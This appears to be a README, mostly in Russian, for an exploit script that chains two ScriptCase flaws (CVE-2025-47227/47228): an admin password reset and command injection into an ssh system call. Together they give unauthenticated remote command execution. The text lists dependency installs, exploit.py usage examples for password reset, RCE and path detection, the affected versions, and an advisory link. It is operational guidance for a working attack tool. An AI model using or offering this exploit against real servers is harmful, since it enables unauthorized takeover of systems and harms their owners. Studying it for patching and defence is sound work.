
ScriptCase Pre-Authenticated Remote Command Execution exploitation script (CVE-2025-47227, CVE-2025-47228).
Удаленное выполнение команд до аутентификации достигается путем объединения двух уязвимостей: первая — возможность сброса пароля администратора консоли производства при определенных условиях, вторая — простая аутентифицированная удаленное выполнение команд в функциях подключения, где ввод пользователя напрямую конкатенируется в системную команду ssh.
Сторонние зависимости Python, используемые эксплойтами, можно установить одной из следующих команд:
# pip - universal
pip3 install Pillow pytesseract requests beautifulsoup4
# pacman - Arch Linux
pacman -S python-pillow python-pytesseract python-requests python-beautifulsoup4
Был написан скрипт эксплуатации для обработки нескольких сценариев:
Использование:
Примеры:
Удаленное выполнение команд до аутентификации (сброс пароля + RCE)
python exploit.py -u http://example.org/scriptcase -c "command"
Только сброс пароля (без аутентификации)
python exploit.py -u http://example.org/scriptcase
Только RCE (требуется учетная запись)
python exploit.py -u http://example.org/scriptcase -c "command" -p 'Password123*'
Определение пути развертывания
python exploit.py -u http://example.org/ -d
Параметры:
-h, --help показать это справочное сообщение и выйти
-u BASE_URL, --base-url=BASE_URL
-c COMMAND, --command=COMMAND
-p PASSWORD, --password=PASSWORD
-d, --detect
Версия 1.0.003-build-2 модуля Production Environment является затронутой. Эта версия модуля входит в состав ScriptCase версии 9.12.006 (23). Предыдущие версии, вероятно, также уязвимы.
https://www.synacktiv.com/advisories/scriptcase-pre-authenticated-remote-command-execution